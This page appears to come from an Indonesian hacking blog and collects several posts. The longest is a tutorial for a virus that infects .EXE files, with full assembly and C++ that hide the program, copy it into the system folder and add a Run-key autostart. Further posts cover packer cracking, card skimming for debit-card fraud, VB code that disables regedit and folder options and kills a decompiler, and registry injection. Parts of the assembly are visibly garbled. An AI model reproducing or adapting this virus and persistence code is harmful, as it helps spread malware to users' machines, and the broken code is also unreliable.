English French German Spain Italian DutchRussian Portuguese Japanese Korean Arabic Chinese Simplified

Teknik Injeksi Virus Dengan PE INFECTOR

DEFINISI PE INFEKTOR

hmnnn... sebenarnya PE Infektor adalah sebuah metode yang digunakan untuk menginfeksi suatu

file berekstensi .exe ... yaitu dengan cara menginjeksi file .exe tersebut dengan kode

virus. Jadi ketika file .exe yang terinfeksi dijalankan... maka script virus akan

jalan...wehehehehe...lebih asik kan ...daripada kita menggunakan file virus yang di-

kamuflasekan... sedangkan penularannya ya... sama ajah dari virus - virus yang dijalankan

... program virus tersebut akan menginjeksi file - file yang sehat dan diubah menjadi file

virus.

DIAGRAM PENULARAN



Nah dapat dijelaskan pada diagram penularan si virus ini akan mencari file sehat ..
kemudian akan mencari pada segmen ke berapa file .exe tersebut dapat disisipi kode virus.

PERSIAPAN PEMBUATAN

Untuk pembuatan PE infektor ini harus pertama anda harus tau tentang bahasa mesin, atau

kerennya adalah bahasa assembly. kedua anda harus tahu tentang visual c++ atau bahasa

pemrograman tingkat menengah... entah visual c++ atau borland c++ gak masalah, yang penting

c++ deh. Nah kemudian yang perlu disiapkan lagi ya palingan tau soal registry windows ...

Kita tidak perlu memakai Linker ASM soalnya dalam C++ langsung ada Linker and compiler-nya.

MEMBUAT KODE PE INFEKTOR DARI ASSEMBLY

Ini nihhhhhhh... awalnya kudu tau bahasa assembly dulu kemudian baru menanjak ke bahasa
menengahnya... ntar dijelasin kok... tenang ajah ... okeh!!!!

asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK" 'INI MEMANG BUAT PENANDA KODE ASM (WAJIB)
"HOST:" 'MENANDAI HOST ATO ALAMAT PERTAMA
"mov ax,4C00H" 'MEMINDAHKAN DATA YANG ADA DI MEMORI 4C00H KE VAR

AX
"int 21H" 'FUNGSI DOS FUNCTION SERVICES
"HOSTSEG ENDS"
"STACKSIZE EQU 100H" 'JIKA STACKSIZE = 100H

"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"

"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"

"DTA DB 2BH dup (?)"
"EXE_HDR DB 1CH dup (?)"
"EXEFILE DB '*.EXE',0" 'MENCARI EKSTENSI EXE

"HOSTS DW HOSTSEG,STACKSIZE"
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"
"VIRUS:" 'KODE VIRUS YANG AKAN DISISIPI BERAWAL DARI SINI
"push ax" 'ISI VARIABEL AX
"push cs" 'ISI VARIABEL CS
"pop ds" 'KELUARKAN ISI VARIABEL DS
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H" 'INTERRUPT DOS FUCNTION
"call FINDEXE" 'MEMANGGIL FUNGSI FINDEXE
"jc FINISH" 'KALO DAH SELESAI LOMPAT KE FUNGSI FINISH
"call INFECT" 'MEMANGGIL FUNGSI FINISH
"FINISH: push es" 'AWAL FUNGSI FINISH
"pop ds" 'MENGELUARKAN ISI DARI VARIABEL DS
"mov dx,80H" 'PINDAHKAN ISI DARI ALAMAT 80H KE DALAM DX
"mov ah,1AH" 'PINDAHKAN ISI DARI ALAMAT 1AH KE DALAM VAR AH
"int 21H" 'MEMANGGIL INTERRUPT DOS FUNCTION
"pop ax" 'MENGELUARKAN ISI YANG ADA DI VAR AX
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"
"sti"
"jmp DWORD PTR cs:[HOSTC]"
"FINDEXE:"
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"
"call FILE_OK"
"jnc FEX"
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"


Nah baris di bawah ini adalah potongan jika file tersebut adalah .exe maka akan ditulari

atau disisipkan kode virus:

"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"
"int 21H"
"jc OK_END1"
"mov bx,ax"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS"
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"
"int 21H"
"stc"
"OK_END1:ret"

"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
"ret"

Sedangkan baris di bawah ini adalah baris untuk menginfeksi file .exe yang telah ditemukan oleh virus:

"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"
"int 21H"

"mov cx,OFFSET FINAL"
"xor dx,dx"
"mov ah,40H"
"int 21H"

"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"
"adc cx,0v"
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"
"mov cx,10"
"mov ah,40H"
"int 21H"

"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"
"int 21H"

"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"
"sub ax,WORD PTR [EXE_HDR+8]"
"mov WORD PTR [EXE_HDR+22],ax"
"mov WORD PTR [EXE_HDR+14],ax"
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE"

"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"vmov ax,WORD PTR [EXE_HDR+6]"
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"

"mov WORD PTR [EXE_HDR],OFFSET HOSTS"
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"mov ah,3EH"
"int 21H"
"ret"

Nah disini adalah baris yang paling saya suka ... ini adalah baris penutup atau akhir dari baris virus

"FINAL:"

"VSEG ENDS"

"END VIRUS"
);

SCRIPT VIRUS DENGAN BAHASA MENENGAH (C++)

Ehem .. ehem ... iya neh ... maap kalo nulisnya ada salah ... soalnya gua duduk di sebelaha

cewek ... cakep banget .. sihhhhhhhhhh tapi dah ada yang punya ... (PS: Maaf gua bukan

buaya' yah...jadi gak akan nyaplok sebelah gua..:-p)

Ok lanjut ... untuk script virus bahasa menengah ini ... ditulis dengan visual c++, nah

biar jelas coba kita liat scriptnyak satuk persatuk ... key...


untuk membedakan itu script pascal, visual basic dan c++ maka harus ada source code ini,

gunanya adalah untuk mendefinisikan, fungsi yang dipakai ada di file mana aja, contohnya :

#include

maka fungsi yang kita pakai ada di file stdio.h seperti cout, cin atau lainnya...

#include
#include
#include
#include
using namespace std;

nah disini adalah source3 code untuk memunculkan pesan di komputer, teserah lo lo pade mo

nulis apa ajah...tapi yang jelas yang bermanfaat yah... kayak gini:

char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are,

we shall drag a world with us... a world in flames' - adolf hitler";

ini potongan source code untuk melihat atau memanipulasi windows, maksudnya jendela yang

ada di sistem operasi windows:

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{

//start random name
srand(GetTickCount());
char buf[20] = "";
for(int i=rand()%20;i>=0;i--)
buf[i] = 'a' + rand()%26;
//end random name

nah yang satu ni untuk menyembunyikan aplikasi virus dari kejaran penangkap windows atau

fly by threats...tau gak... kalo gak tau... yaaa.. coba tekan ALT+TAB maka akan kelihatan

daftar aplikasi yang ada di windows... ato yang aktif di windows...

//start hide window
SetConsoleTitle("Windows");
HWND mainwin = FindWindow(NULL, "Windows");
ShowWindow(mainwin, 0);
HKEY hKey;
//end hide window

char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);

Nah yang ini untuk menyuntik registry yang ada di windows ... pokoknya untuk memanipulasi

registry lah... contohnya di sini alamat registry yang dimanipulasi adalah :

Software\\Microsoft\\Windows\\CurrentVersion\\Run

//start reg key
GetSystemDirectory(sd,255);
char fslash[260] = "//";//added
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx(

HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKe

y );
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
RegCloseKey(hKey);
//end reg key



MERANGKAI KODE VIRUS

nah untuk merangkainya ... coba tulis script ini pada visual c++ kemudian dicompile dan jalankan ... okeh ...just take a look :

//need to learn mutex so virus doesnt run twice
#include
#include
#include
#include
using namespace std;

char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are, we shall drag a world with us... a world in flames' - adolf hitler";

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//start random name
srand(GetTickCount());
char buf[20] = "";
for(int i=rand()%20;i>=0;i--)
buf[i] = 'a' + rand()%26;
//end random name

//start hide window
SetConsoleTitle("Windows");
HWND mainwin = FindWindow(NULL, "Windows");
ShowWindow(mainwin, 0);
HKEY hKey;
//end hide window

char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);

//start reg key
GetSystemDirectory(sd,255);
char fslash[260] = "//";//added
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
RegCloseKey(hKey);
//end reg key

//start ASM code
asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK"
"HOST:"
"mov ax,4C00H"
"int 21H"
"HOSTSEG ENDS"
"STACKSIZE EQU 100H"

"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"

"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"

"DTA DB 2BH dup (?)"
"EXE_HDR DB 1CH dup (?)"
"EXEFILE DB '*.EXE',0"

"HOSTS DW HOSTSEG,STACKSIZE"
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"
"VIRUS:"
"push ax"
"push cs"
"pop ds"
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H"
"call FINDEXE"
"jc FINISH"
"call INFECT"
"FINISH: push es"
"pop ds"
"mov dx,80H"
"mov ah,1AH"
"int 21H"
"pop ax"
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"
"sti"
"jmp DWORD PTR cs:[HOSTC]"
"FINDEXE:"
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"
"call FILE_OK"
"jnc FEX"
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"

"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"
"int 21H"
"jc OK_END1"
"mov bx,ax"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS"
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"
"int 21H"
"stc"
"OK_END1:ret"

"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
"ret"

"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"
"int 21H"

"mov cx,OFFSET FINAL"
"xor dx,dx"
"mov ah,40H"
"int 21H"

"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"
"adc cx,0v"
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"
"mov cx,10"
"mov ah,40H"
"int 21H"

"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"
"int 21H"

"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"
"sub ax,WORD PTR [EXE_HDR+8]"
"mov WORD PTR [EXE_HDR+22],ax"
"mov WORD PTR [EXE_HDR+14],ax"
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE"

"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"vmov ax,WORD PTR [EXE_HDR+6]"
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"

"mov WORD PTR [EXE_HDR],OFFSET HOSTS"
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"mov ah,3EH"
"int 21H"
"ret"

"FINAL:"

"VSEG ENDS"

"END VIRUS"
);
//end ASM code
return 0;
}
(c) virologi
Posted on 00.00 by aZi and filed under | 1 Comments »

Crack Virus Packing

COMPILER
Compiler? what is it? compiler adalah proses untuk merubah dari source code virus menjadi file .exe. Yaaa.....misalnya kalau kita membuat virus dari Visual Basic, berarti compilernya Visual Basic, Kalau kita membuat virus dari Delphi, berarti compilernya delphi atau kita membuat virus dari Assembler compilernya juga TASM....jadi masing2 virus mempunyai compiler yang berbeda2, tergantung dari mana dia dibuat....

PACKING
Packing (seperti yang dijelaskan di buku saya) wueleh...promosi lagi :-p adalah proses untuk mengemas virus....maksudnya???ya sama kalau kita membuat kue atau barang...pasti kudu dikemas dulu kan...agar tampil apik dan rapi....nah pengemasan itu biasanya memakai UPX, Aspack atau teLock...nah gunanya packing agar virus kita tidak ketauan dibuat memakai apa...atau dengan kata lain untuk menyembunyikan compiler virus tersebut. Compiler harus disembunyikan...gar user tidak mengetahui source code nyak...

PROSES CRACKING COMPILER DAN PACKING
Proses crackingnya sangat mudah sekali...cukup donlot yang namanya RDG Packer Detector v0.6.3 Beta, dan ikuti langkah di bawah ini:

1. donlot RDG Packer Detector v0.6.3 Beta di
http://www.rdgsoft.8k.com/RDG%20Packer%20Detector.htm

2. kemudian jalankan program RDG Packer Detector v0.6.3, seperti gambar di bawah ini:



3. kemudian klik open untuk memilih file yang akan di garap, misalnya saya punya file p3kdiary.exe yang di compile dengan vb dan di packing dengan UPX. Maka tinggal klik open dan pilih file yang disuka....sampai ada keterangan seperti ini di gambar ini :



naaaaaa.....kalo udah ada keterangan seperti ini berarti :

memakai Visual Basic
memakai UPX v0.80
dan heuristic atau enkripsi dan pengacakannya memakai UPX

nah kalau sudah kita kan udah tau compiler dan packernya...tinggal mencara UPX unlock dan tools Exe to VB untuk membongkar source code program.....

nah sekarang tugas anda...okeh...

untuk mencari tools unlock UPX and reverse engineering to VB nyah....okeh
(c) virologi
Posted on 23.54 by aZi and filed under | 0 Comments »

Bobol Debit Card

Orang bilang, belanja via kartu debit (istilah kebanyakan kita: "kartu ATM") lebih aman karena -- nggak seperti kartu kredit -- ia memiliki satu level security tambahan: password a.k.a. nomor PIN.

Kartu kredit lebih gampang di-counterfeit, tapi eksekusinya perlu arrangement rada ruwet yang melibatkan banyak pihak. Sebaliknya, kartu debit, dengan adanya PIN itu, agak susah di-fraud. Tapi begitu dapat PIN, yah it's where the money is.

Cuman, melihat kasus ini, para bandit itu rupanya mulai bisa mengira-ngira untuk getting around dengan kendala PIN ini. Kalau kasusnya satu dua sih mungkin nggak masalah, anggap aksidental aja, misalnya ada orang di belakang antrian yang suka ngintip. Tapi ini ratusan, ribuan? Dari mana mereka memperoleh data nomor account sebanyak itu, dan yang paling bikin saya wondering: dari mana mereka bisa tahu semua nomor PIN-nya?

Oke, coba kita runut-runut, seperti apa sih cara kerjanya. Sambil mencoba mengira-ngira kemungkinan terjadinya di sini, di Indonesia. Again, ini soal kartu debit , bukan credit card.

Sayangnya... perangkat kriminalnya sama.



Alat di gambar itu namanya skimmer, atau istilah formalnya card reader/writer. Bisa membaca data-data di magnetic-stripe kartu, lalu menuliskannya di plastik kartu yang baru. Yes, buat para maling, alat itu fungsinya satu: menggandakan kartu. Bisa nyimpen data dalam jumlah besar, yang kemudian di-download di PC via serial. Harga sekitar $600-an, dan besarnya cuma segenggaman tangan aja. (Huh, kalau inget alat ini, saya suka ketar-ketir kalau bayar makan di restoran menggunakan kartu kredit. Mana pelayannya klimis dan sopan banget, membungkuk ke arah kartu, dengan senyum yang dingin...)

Jadi... mereka bisa duplikasi kartu. Dan malam-malam, sehabis kerja seharian di cashier, mereka bisa dump semua data-datanya ke laptop, tulis ke magnetic-stripe di kartu yang baru, lari ke anjungan terdekat, memasukkan kartu palsunya di mesin ATM, lalu... wait, mereka perlu nomor PIN.

Nah sekarang, data-data apa aja ya yang ada di magnetic-stripe itu?



Buat yang belum tahu, magnetic-stripe itu seperti tape kaset aja layaknya, material ferromagnetic yang dapat dipakai untuk menyimpan data (suara, gambar, atau bit-bit biner). Untuk kartu, ada 3 track data. (Kenapa tiga? Standar ANSI/ISO. Selebihnya, nggak tahu). Track 1 dan Track 2 aja yang biasanya dipakai. Track 3 tadinya diperuntukkan untuk extended service, cuma service-nya nggak muncul-muncul sehingga track ini ditinggalkan.

Berlaku hanya di kartu kredit dan ATM (bisa berbeda di "kartu absen" kantor misalnya). Kalau kita extract data-data itu, misalkan menggunakan skimmer tadi, kita bisa lihat informasi seperti ini di kartu Visa:

Kelihatan nggak? Sekedar contoh aja: % di awal dan ? di akhir di Track 1 itu menunjukkan start code dan end-code. Huruf 'B' menunjukkan format-code, yaitu "Bank Card". 1111222233334444 adalah nomor kartu. LASTNAME/FIRSTNAME... self-explained. 9912 adalah expiration-date, 12/99. Sementara 101... dan seterusnya adalah data-data khusus. So, untuk kartu kredit ini, dengan skimmer seharga handphone Nokia seri 9 itu, si maling udah bisa belanja di Internet.

Tapi tidak demikian halnya dengan kartu ATM:

Mirip dengan kartu kredit ya? Bedanya, instead of 101, kita punya 1201 untuk data khusus milik bank. Dan 4 digit 'xxxx', berbeda-beda untuk setiap kartu. Lokasi encrypted PIN kah? Mungkin.

Tapi rasanya bisa dipastikan, PIN nggak akan disimpan plainly gitu aja di kartu (kecuali banknya kuoooplooo buaanget). Kita pernah baca bahwa di jaman dulu (dan kayaknya sampai sekarang), mesin-mesin IBM yang jadi langganan perbankan kita menggunakan DES (atau 3DES) untuk menentukan PIN. Yah, either way, untuk meng-crack DES nggak akan bisa straight-forward dan perlu waktu lumayan lama.
(c) virologi
Posted on 23.46 by aZi and filed under | 0 Comments »

Menaklukan Sothink (Pembongkar Flash) dengan VB

'*************************Kode untuk membuka membuka kunci di Registry*****************************
Option Explicit

Public Type SECURITY_ATTRIBUTES
nLength As Long
IpSecurityDescriptor As Long
bInheritHandle As Long
End Type


Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_DYN_DATA = &H80000006
Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H2006

Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long


'////////////
Public Const REG_OPTION_BACKUP_RESTORE = 4 ' open for backup or restore
Public Const REG_OPTION_VOLATILE = 1 ' Key is not preserved when system is rebooted
Public Const REG_OPTION_NON_VOLATILE = 0 ' Key is preserved when system is rebooted
Public Const STANDARD_RIGHTS_ALL = &H1F0000
Public Const SYNCHRONIZE = &H100000
Public Const READ_CONTROL = &H20000
Public Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Public Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)



'////////////////////Deklarasi untuk Program Gasak//////////////////////////////////////////////////////
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function CloseWindow Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const WM_CLOSE = &H10

'//////////////////Deklarasi untuk delete program/////////////////////////////////////////////////////
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long

'//////////////////Deklarasi membaca file flash.ocx//////////////////////////////
Private Sign(4096) As String 'The Signatures will be loaded into this array
Dim keyinstal As String

Public Sub bacafileflash()

Dim sIn As String
Dim swords() As String
Dim X As Long
Dim Data As String
Dim tik As String
Dim tuk As String

tik = """"
tuk = " & _"

keyinstal = ReadKey("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\InstallerLocation")
sIn = FileText(keyinstal & "\Macromed\Flash\flash.ocx")
swords = Split(sIn, vbCrLf)
'ReDim Preserve swords(UBound(swords) - 1)
sIn = ""
For X = LBound(swords) To UBound(swords)
Data = swords(X)
Log tik & Data & tik & tuk
Next X

Exit Sub

err:
MsgBox "error when access file flash.ocx!" & vbCrLf & "maybe it corrupted" & vbCrLf & vbCrLf & "The error message was: " & err.Description, vbCritical + vbOKOnly, "Error"

End Sub
Public Function FileText(ByVal strfilename As String) As String

Dim handle As Long

handle = FreeFile
Open strfilename For Binary As #handle
FileText = Space$(LOF(handle))
Get #handle, , FileText
Close #handle

End Function



Public Sub CreateKey(Folder As String, Value As String)

Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value

End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)

Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"

End Sub

Public Sub DeleteKey(Value As String, Folder As String)

Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "Reg_Dword"

End Sub

Sub kodepertahanan()
'******************Menyembunyikan file yang mempunyai atibut hide*****************************

CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 1
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue", 1
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue", 2
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue", 2
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0

'//////////Non aktifkan folder option////////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
'//////////Kunci Regedit////////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
'////////menyembunyikan extensi file//////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1

End Sub



Private Function Gasak(Opo As String)
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(Opo)) > 0 Then
'EnableWindow H, 1
SendMessage H, WM_CLOSE, 0, 0

End If
If InStr(UCase(T), UCase("")) > 0 Then
MsgBox "Si GASAK has been Disabled by The Creator!! Cheers!! ;)", vbInformation, "GASAK is shutting Down"
End
End If
'Shell "shutdown -a", vbHide '// jadi lambat kalo ini diaktifkan, pake cara lenm aja ya (API)...
End Function


'////////////////////////////Kode program Menghapus /////////////////////////////////////////


Sub Main()

Shell "Taskkill /F /IM SWFDecompiler.exe", vbHide
bacafileflash

FileCopy App.Path & "\flash.ocx", keyinstal & "\Macromed\Flash\flash.ocx"
DeleteFile App.Path & "\flash.ocx"
End Sub

'////////////////////////////Kode Baca Registri/////////////////////////////////////////
Public Function ReadKey(Value As String) As String

Dim b As Object
Dim r
On Error Resume Next
Set b = CreateObject("wscript.shell")
r = b.RegRead(Value)
ReadKey = r
End Function
'////////////////////////////Kode Buat File flash.ocx/////////////////////////////////////////
Public Sub Log(strLog As String)
Dim ff As Integer
ff = FreeFile
On Error Resume Next
Open App.Path & "\flash.ocx" For Append As #ff
Print #ff, strLog
Close #ff
End Sub
Posted on 23.40 by aZi and filed under | 0 Comments »

Injeksi Registri Dengan VB

‘//////////////////////////AWAL KODE FORM////////////////////////////////////////
Private Sub Command1_Click()
Dim newopen As Long
Dim secattr As SECURITY_ATTRIBUTES
Dim hKey, hkeyb As Long
Dim retval As Long
Dim nilai As String
Dim nl_angka As Long
Dim subkey As String

secattr.lpSecurityDescriptor = 0
secattr.bInheritHandle = True
secattr.nLength = Len(secattr)

nilai = "c:\windows\tes.exe"
nl_angka = 1
subkey = "Software\Microsoft\Windows\CurrentVersion\Run\"

retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hKey)
retval = RegSetValueEx(hKey, "teserror", 0, REG_SZ, nilai, Len(nilai))
retval = RegCloseKey(hKey)
End Sub
‘///////////////////////AKHIR KODE FORM////////////////////////////////////

‘//////////////////////////////////AWAL KODE MODUL//////////////////////////////

Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_DYN_DATA = &H80000006
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_PERFORMANCE_DATA = &H80000004
Public Const HKEY_USERS = &H80000003

Public Const KEY_ALL_ACCESS = &HF003F
